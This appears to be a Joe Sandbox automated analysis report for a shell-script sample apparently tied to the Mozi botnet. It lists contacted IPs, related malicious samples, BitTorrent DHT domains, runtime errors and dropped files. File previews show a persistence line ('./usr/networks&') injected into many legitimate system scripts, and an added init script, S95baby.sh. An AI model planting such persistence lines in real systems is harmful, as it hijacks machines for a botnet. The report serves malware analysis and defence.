                                                            187.11.37.82
                                                            		unknownBrazil
                                                            		27699TELEFONICABRASILSABRfalse
                                                            69.91.47.228
                                                            		unknownUnited States
                                                            		11427TWC-11427-TEXASUSfalse
                                                            53.49.108.194
                                                            		unknownGermany
                                                            		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                            125.68.189.12
                                                            		unknownChina
                                                            		38283CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetDatafalse
                                                            98.80.130.179
                                                            		unknownUnited States
                                                            		11351TWC-11351-NORTHEASTUSfalse
                                                            105.87.139.22
                                                            		unknownEgypt
                                                            		36992ETISALAT-MISREGfalse
                                                            168.122.210.178
                                                            		unknownUnited States
                                                            		111BOSTONU-ASUSfalse
                                                            67.154.225.218
                                                            		unknownUnited States
                                                            		2828XO-AS15USfalse
                                                            135.114.116.178
                                                            		unknownUnited States
                                                            		10455LUCENT-CIOUSfalse
                                                            163.136.89.118
                                                            		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                                                            88.117.139.76
                                                            		unknownAustria
                                                            		8447TELEKOM-ATA1TelekomAustriaAGATfalse
                                                            163.55.185.59
                                                            		unknownJapan2497IIJInternetInitiativeJapanIncJPfalse
                                                            67.194.169.78
                                                            		unknownUnited States
                                                            		36375UMICH-AS-5USfalse
                                                            147.45.243.245
                                                            		unknownRussian Federation
                                                            		2895FREE-NET-ASFREEnetEUfalse
                                                            175.210.60.254
                                                            		unknownKorea Republic of
                                                            		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                            86.125.111.1
                                                            		unknownRomania
                                                            		8708RCS-RDS73-75DrStaicoviciROfalse
                                                            16.21.94.155
                                                            		unknownUnited States
                                                            		unknownunknownfalse
                                                            63.89.240.37
                                                            		unknownUnited States
                                                            		701UUNETUSfalse
                                                            181.65.68.78
                                                            		unknownPeru
                                                            		6147TelefonicadelPeruSAAPEfalse
                                                            133.60.186.200
                                                            		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                                                            59.192.38.107
                                                            		unknownChina
                                                            		2516KDDIKDDICORPORATIONJPfalse
                                                            145.200.155.76
                                                            		unknownNetherlands
                                                            		1101IP-EEND-ASIP-EENDBVNLfalse
                                                            122.145.165.234
                                                            		unknownJapan10013FBDCFreeBitCoLtdJPfalse
                                                            86.66.84.251
                                                            		unknownFrance
                                                            		15557LDCOMNETFRfalse
                                                            217.198.0.163
                                                            		unknownRussian Federation
                                                            		20720TOL-ASRUfalse
                                                            212.58.38.181
                                                            		unknownUnited Kingdom
                                                            		8586OBSL-ASTalkTalk-BusinessdivisionGBfalse
                                                            120.26.205.75
                                                            		unknownChina
                                                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                            39.58.236.135
                                                            		unknownPakistan
                                                            		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
                                                            105.152.92.179
                                                            		unknownMorocco
                                                            		6713IAM-ASMAfalse
                                                            38.158.59.90
                                                            		unknownUnited States
                                                            		174COGENT-174USfalse
                                                            102.5.14.36
                                                            		unknownunknown
                                                            		36926CKL1-ASNKEfalse
                                                            94.141.229.241
                                                            		unknownRussian Federation
                                                            		41798TTC-ASJSCTranstelecomKZfalse
                                                            24.91.81.168
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            119.4.226.185
                                                            		unknownChina
                                                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                            200.5.135.104
                                                            		unknownVenezuela
                                                            		8151UninetSAdeCVMXfalse
                                                            46.4.218.5
                                                            		unknownGermany
                                                            		24940HETZNER-ASDEfalse
                                                            70.112.192.65
                                                            		unknownUnited States
                                                            		11427TWC-11427-TEXASUSfalse
                                                            98.210.30.71
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            213.252.178.60
                                                            		unknownGermany
                                                            		9066BCCHinterdemTurme12DEfalse
                                                            145.232.209.196
                                                            		unknownSwitzerland
                                                            		15675ETAT-DE-VAUDCHfalse
                                                            17.132.17.181
                                                            		unknownUnited States
                                                            		714APPLE-ENGINEERINGUSfalse
                                                            210.124.201.174
                                                            		unknownKorea Republic of
                                                            		3786LGDACOMLGDACOMCorporationKRfalse
                                                            144.181.223.184
                                                            		unknownNorway
                                                            		25400TELIA-NORWAY-ASTeliaNorwayCoreNetworksNOfalse
                                                            123.222.206.245
                                                            		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                                            26.170.22.231
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            185.199.7.63
                                                            		unknownRussian Federation
                                                            		38976RU-ATVC-ASRUfalse
                                                            191.195.251.222
                                                            		unknownBrazil
                                                            		26599TELEFONICABRASILSABRfalse
                                                            184.208.244.4
                                                            		unknownUnited States
                                                            		10507SPCSUSfalse
                                                            100.247.223.10
                                                            		unknownUnited States
                                                            		21928T-MOBILE-AS21928USfalse
                                                            223.68.174.98
                                                            		unknownChina
                                                            		56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                                                            170.50.42.161
                                                            		unknownUnited States
                                                            		11406CIGNA-1USfalse
                                                            37.183.225.87
                                                            		unknownItaly
                                                            		30722VODAFONE-IT-ASNITfalse
                                                            90.69.78.230
                                                            		unknownFrance
                                                            		12479UNI2-ASESfalse
                                                            193.158.229.141
                                                            		unknownGermany
                                                            		3320DTAGInternetserviceprovideroperationsDEfalse
                                                            76.212.164.182
                                                            		unknownUnited States
                                                            		7018ATT-INTERNET4USfalse
                                                            82.222.206.85
                                                            		unknownTurkey
                                                            		34984TELLCOM-ASTRfalse
                                                            188.50.35.239
                                                            		unknownSaudi Arabia
                                                            		25019SAUDINETSTC-ASSAfalse
                                                            73.44.243.3
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            110.161.16.195
                                                            		unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                                                            176.190.90.3
                                                            		unknownFrance
                                                            		5410BOUYGTEL-ISPFRfalse
                                                            186.110.45.252
                                                            		unknownArgentina
                                                            		7303TelecomArgentinaSAARfalse
                                                            154.32.220.46
                                                            		unknownUnited Kingdom
                                                            		1290TELSTRAEUROPELTD-BACKBONETelstraEuropeLtdEUfalse
                                                            194.181.5.184
                                                            		unknownPoland
                                                            		8308NASK-COMMERCIALPLfalse
                                                            68.65.138.36
                                                            		unknownUnited States
                                                            		11915US-TELEPACIFICUSfalse
                                                            75.150.131.245
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            174.176.240.91
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            164.65.9.101
                                                            		unknownUnited States
                                                            		1778DNIC-AS-01778USfalse
                                                            106.202.19.20
                                                            		unknownIndia
                                                            		45609BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSServicefalse
                                                            192.242.78.25
                                                            		unknownUnited States
                                                            		11363FUJITSU-USAUSfalse
                                                            201.253.51.131
                                                            		unknownArgentina
                                                            		7303TelecomArgentinaSAARfalse
                                                            96.220.84.8
                                                            		unknownUnited States
                                                            		7922COMCAST-7922USfalse
                                                            74.59.149.216
                                                            		unknownCanada
                                                            		5769VIDEOTRONCAfalse
                                                            115.129.103.88
                                                            		unknownAustralia
                                                            		133612VODAFONE-AS-APVodafoneAustraliaPtyLtdAUfalse
                                                            104.217.29.14
                                                            		unknownUnited States
                                                            		40676AS40676USfalse
                                                            174.125.112.165
                                                            		unknownUnited States
                                                            		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                            124.93.117.153
                                                            		unknownChina
                                                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                            211.77.127.153
                                                            		unknownTaiwan; Republic of China (ROC)
                                                            		9674FET-TWFarEastToneTelecommunicationCoLtdTWfalse
                                                            165.136.72.146
                                                            		unknownUnited States
                                                            		2381WISCNET1-ASUSfalse
                                                            139.175.26.151
                                                            		unknownTaiwan; Republic of China (ROC)
                                                            		4780SEEDNETDigitalUnitedIncTWfalse


                                                            Runtime Messages

                                                            Command:/tmp/bin.sh
                                                            Exit Code:0
                                                            Exit Code Info:
                                                            Killed:False
                                                            Standard Output:

                                                            Standard Error:telnetd: no process found
                                                            utelnetd: no process found
                                                            scfgmgr: no process found
                                                            Unsupported ioctl: cmd=0xffffffff80045705
                                                            Unsupported ioctl: cmd=0xffffffff80045705
                                                            Unsupported ioctl: cmd=0xffffffff80045705
                                                            /bin/sh: 1: cfgtool: not found
                                                            /bin/sh: 1: cfgtool: not found
                                                            Unsupported ioctl: cmd=0xffffffff80045705
                                                            Unsupported ioctl: cmd=0xffffffff80045705

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            bttracker.acc.umu.senT7K5GG5kmGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            KnAY2OIPI3Get hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            rIbyGX66OpGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            MGuvcs6OczGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            YPJ9DZYIpOGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            mozi.a.zipGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            bin.shGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            iGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            Mozi.mGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            Photo.exeGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            new.exeGet hashmaliciousBrowse
                                                            • 130.239.18.159
                                                            dht.transmissionbt.comAce_Stream_Media_3.1.32.exeGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            nT7K5GG5kmGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            KnAY2OIPI3Get hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            rIbyGX66OpGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            MGuvcs6OczGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            YPJ9DZYIpOGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            mozi.a.zipGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            bin.shGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            iGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            Mozi.mGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            Photo.exeGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                            • 212.129.33.59
                                                            new.exeGet hashmaliciousBrowse
                                                            • 87.98.162.88
                                                            popcorntime.apkGet hashmaliciousBrowse
                                                            • 87.98.162.88

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            DU-AS1AEz0x3n.armGet hashmaliciousBrowse
                                                            • 94.207.100.138
                                                            loligang.x86Get hashmaliciousBrowse
                                                            • 91.72.131.112
                                                            UMzkP6ANWUGet hashmaliciousBrowse
                                                            • 80.227.46.117
                                                            xE9RTUBg8VGet hashmaliciousBrowse
                                                            • 80.227.46.102
                                                            husAc5LfPPGet hashmaliciousBrowse
                                                            • 80.227.46.131
                                                            H2aFK6zw8wGet hashmaliciousBrowse
                                                            • 87.201.164.3
                                                            IerRT1TVsbGet hashmaliciousBrowse
                                                            • 5.31.80.83
                                                            B5DfmI0PggGet hashmaliciousBrowse
                                                            • 94.204.106.200
                                                            2Opma5FtyCGet hashmaliciousBrowse
                                                            • 94.204.106.210
                                                            apep.arm7Get hashmaliciousBrowse
                                                            • 94.207.100.152
                                                            sora.x86Get hashmaliciousBrowse
                                                            • 80.227.46.129
                                                            eGH4d5FDoUGet hashmaliciousBrowse
                                                            • 80.227.46.147
                                                            8wdtrqd3z0Get hashmaliciousBrowse
                                                            • 91.72.131.159
                                                            fZ9Y8XVXDHGet hashmaliciousBrowse
                                                            • 91.74.182.149
                                                            v9o2vinbUjGet hashmaliciousBrowse
                                                            • 91.74.182.146
                                                            QaCRsRGMybGet hashmaliciousBrowse
                                                            • 91.74.182.149
                                                            QSjpGBd7GvGet hashmaliciousBrowse
                                                            • 91.74.73.87
                                                            27xJuvcfMMGet hashmaliciousBrowse
                                                            • 91.72.218.214
                                                            3AlyfRnHRdGet hashmaliciousBrowse
                                                            • 80.227.46.178
                                                            pZvr71PT9vGet hashmaliciousBrowse
                                                            • 94.204.154.100
                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSBGnvdqMvVlGet hashmaliciousBrowse
                                                            • 40.82.61.167
                                                            0sPs3tj4MUGet hashmaliciousBrowse
                                                            • 20.82.240.223
                                                            NmYDz4fPbWGet hashmaliciousBrowse
                                                            • 20.136.162.189
                                                            Si99cjuDJfGet hashmaliciousBrowse
                                                            • 20.48.198.22
                                                            K1kUt3MxkSGet hashmaliciousBrowse
                                                            • 20.126.244.67
                                                            z0x3n.arm7Get hashmaliciousBrowse
                                                            • 13.64.67.57
                                                            z0x3n.x86Get hashmaliciousBrowse
                                                            • 20.8.104.103
                                                            11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                                            • 20.109.158.80
                                                            nQStEX9iHaGet hashmaliciousBrowse
                                                            • 191.237.178.70
                                                            mGkwCPfEuxGet hashmaliciousBrowse
                                                            • 191.237.178.85
                                                            apep.arm7Get hashmaliciousBrowse
                                                            • 191.234.174.126
                                                            n8pWtYC8fTGet hashmaliciousBrowse
                                                            • 20.76.141.240
                                                            4AN3U7ayiOGet hashmaliciousBrowse
                                                            • 52.109.12.18
                                                            MKsnmEA7gFGet hashmaliciousBrowse
                                                            • 20.5.158.152
                                                            loligang.x86Get hashmaliciousBrowse
                                                            • 20.113.107.39
                                                            kL0ylBRTrYGet hashmaliciousBrowse
                                                            • 20.203.159.17
                                                            IqvMDvuMc5Get hashmaliciousBrowse
                                                            • 40.85.107.195
                                                            he7hRoAnnxGet hashmaliciousBrowse
                                                            • 191.232.45.218
                                                            9B6EN8PxhHGet hashmaliciousBrowse
                                                            • 13.104.235.228

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            /etc/init.d/S95baby.shnT7K5GG5kmGet hashmaliciousBrowse
                                                              KnAY2OIPI3Get hashmaliciousBrowse
                                                                rIbyGX66OpGet hashmaliciousBrowse
                                                                  MGuvcs6OczGet hashmaliciousBrowse
                                                                    mozi.a.zipGet hashmaliciousBrowse
                                                                      bin.shGet hashmaliciousBrowse
                                                                        iGet hashmaliciousBrowse
                                                                          Mozi.mGet hashmaliciousBrowse
                                                                            Mozi.mGet hashmaliciousBrowse
                                                                              1skm346XtzGet hashmaliciousBrowse
                                                                                Mozi.aGet hashmaliciousBrowse
                                                                                  Mozi.1.mGet hashmaliciousBrowse
                                                                                    6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                      7v1ic5IS8IGet hashmaliciousBrowse
                                                                                        Mozi.aGet hashmaliciousBrowse
                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                            Mozi.mGet hashmaliciousBrowse
                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                  bad_fileGet hashmaliciousBrowse

                                                                                                    Created / dropped Files

                                                                                                    /boot/grub/i386-pc/modinfo.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/acpi/asus-keyboard-backlight.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):5.2904323771702915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                    MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                    SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                    SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                    SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                    /etc/acpi/asus-wireless.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):157
                                                                                                    Entropy (8bit):4.412729940630044
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                    MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                    SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                    SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                    SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                    /etc/acpi/ibm-wireless.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):636
                                                                                                    Entropy (8bit):4.722087767454589
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                    MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                    SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                    SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                    SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                    /etc/acpi/powerbtn.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2079
                                                                                                    Entropy (8bit):4.778187000249208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                    MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                    SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                    SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                    SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                    /etc/acpi/tosh-wireless.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):483
                                                                                                    Entropy (8bit):4.215331622973397
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                    MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                    SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                    SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                    SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                    /etc/acpi/undock.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):4.77497394042067
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                    MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                    SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                    SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                    SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                    /etc/bash_completion.d/libreoffice.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /etc/init.d/S95baby.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):3.8936606896881854
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TKH4v0VJ:hK
                                                                                                    MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                    SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                    SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                    SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                    Malicious:true
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: nT7K5GG5km, Detection: malicious, Browse
                                                                                                    • Filename: KnAY2OIPI3, Detection: malicious, Browse
                                                                                                    • Filename: rIbyGX66Op, Detection: malicious, Browse
                                                                                                    • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                    • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                    • Filename: bin.sh, Detection: malicious, Browse
                                                                                                    • Filename: i, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                    • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                    • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                    • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                    • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                    • Filename: bad_file, Detection: malicious, Browse
                                                                                                    Preview: #!/bin/sh./usr/networks&.
                                                                                                    /etc/init.d/bootmisc.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148
                                                                                                    Entropy (8bit):4.718194263525147
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                    MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                    SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                    SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                    SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                    Malicious:true
                                                                                                    Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                    /etc/init.d/checkfs.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):147
                                                                                                    Entropy (8bit):4.7173471450646
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                    MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                    SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                    SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
